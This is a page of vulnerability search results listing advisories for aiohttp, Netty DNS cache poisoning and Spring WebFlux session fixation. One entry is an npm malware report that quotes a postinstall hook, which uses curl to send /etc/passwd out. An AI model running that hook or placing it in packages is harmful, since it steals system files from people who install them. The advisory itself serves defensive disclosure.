CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

Github Security Blog•added 2 days ago•4 views

aiohttp: Host-Only Cookies Become Domain Cookies After CookieJar Persistence

Summary Host-only cookies that are saved with CookieJar.save and then restored later with CookieJar.load lose their host-only status. Impact Host-only cookies that have been loaded from disk may get sent to subdomains that previously should have been disallowed. ----- Patch:...

5.3AI score0.00024EPSS

Exploits0References2Affected Software1

GithubExploit•added 2 days ago•49 views

exploit-scripts

Offensive Security Toolkit ╔═════════════════════════════...

6AI score

Exploits0

NVD•added 5 days ago•9 views

CVE-2026-47691

Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, Netty's DnsResolveContext insufficiently validates the bailiwick of NS records, enabling DNS Cache Poisoning. An attacker controlling an authoritative name...

10CVSS0.0024EPSS

Vulnrichment•added 5 days ago•7 views

CVE-2026-47691 Netty has Insufficient Bailiwick Validation for NS Records

8.7CVSS5.3AI score0.0024EPSS

CNNVD•added 2026/06/10 12:0 a.m.•3 views

OpenVM 输入验证错误漏洞

OpenVM is an open-source, high-performance, and modularized zkVM framework designed for customization and scalability. Prior to OpenVM 1.6.0, there was a vulnerability related to input validation errors. This vulnerability stemmed from the tryhonestpairingcheck function in the openvm-pairing...

8.7CVSS5.3AI score0.00226EPSS

OSV•added 2026/06/09 5:19 p.m.•7 views

MAL-2026-5429 Malicious code in @shell-landing/routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577 On npm install, the package's postinstall hook runs node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...

5.5AI score

NVD•added 2026/06/09 5:16 a.m.•8 views

CVE-2026-41839

A WebFlux application with a compromised subdomain for example, compromised via cross-site scripting XSS is vulnerable to an escalation attack exchanging a known session ID for that of an authenticated user. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0...

4.2CVSS0.00133EPSS

OSV•added 2026/06/09 5:16 a.m.•4 views

UBUNTU-CVE-2026-41839

Veracode•added 2026/06/09 5:1 a.m.•8 views

DNS Cache Poisoning

Netty is vulnerable to DNS Cache Poisoning. The vulnerability is due to insufficient validation of the bailiwick of NS records in DnsResolveContext, which allows an attacker controlling an authoritative subdomain name server to poison DNS cache entries for parent domains...

10CVSS5.5AI score0.0024EPSS

Exploits0References4Affected Software1

Cvelist•added 2026/06/09 3:49 a.m.•28 views

CVE-2026-41839 Spring Framework Escalation via Session Fixation in WebFlux

4.2CVSS0.00133EPSS

EUVD•added 2026/06/09 3:49 a.m.•6 views

EUVD-2026-35326

Vulnrichment•added 2026/06/09 3:49 a.m.•4 views

CVE-2026-41839 Spring Framework Escalation via Session Fixation in WebFlux

Debian CVE•added 2026/06/09 3:49 a.m.•5 views

CVE-2026-41839

CNNVD•added 2026/06/09 12:0 a.m.•3 views

Exploits0

Spring Framework 授权问题漏洞

The Spring Framework is an application development framework developed by Spring in open source. Versions 7.0.0 to 7.0.7, 6.2.0 to 6.2.18, 6.1.0 to 6.1.27, and 5.3.0 to 5.3.48 of the Spring Framework contain authorization vulnerabilities. These vulnerabilities stem from the WebFlux application,...

4.2CVSS5.3AI score0.00133EPSS

Positive Technologies•added 2026/06/09 12:0 a.m.•7 views

PT-2026-47650

Tenable Nessus•added 2026/06/09 12:0 a.m.•8 views

Exploits0References2

Linux Distros Unpatched Vulnerability : CVE-2026-41839

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - A WebFlux application with a compromised subdomain for example, compromised via cross-site scripting XSS is vulnerable to an escalation attack exchanging a know...

4.2CVSS5.4AI score0.00133EPSS

Github Security Blog•added 2026/06/08 11:2 p.m.•7 views

Netty has Insufficient Bailiwick Validation for NS Records

Summary Netty's DnsResolveContext insufficiently validates the bailiwick of NS records, enabling DNS Cache Poisoning. An attacker controlling an authoritative name server for a subdomain can poison the cache for parent domains like .co.uk. Details In...

10CVSS5.5AI score0.0024EPSS

Exploits0References5Affected Software1

Positive Technologies•added 2026/06/08 12:0 a.m.•11 views

PT-2026-47614

Name of the Vulnerable Software and Affected Versions Netty ionetty:netty-resolver-dns affected versions not specified Description Insufficient validation of the bailiwick of NS records in DnsResolveContext allows for DNS Cache Poisoning. An attacker controlling an authoritative name server for a...

10CVSS5.5AI score0.0024EPSS

Exploits0References26

Snyk•added 2026/06/08 12:0 a.m.•4 views

Session Fixation

Overview org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform. Affected versions of this package are vulnerable to Session Fixation via session fixation...

6.5CVSS5.3AI score0.00133EPSS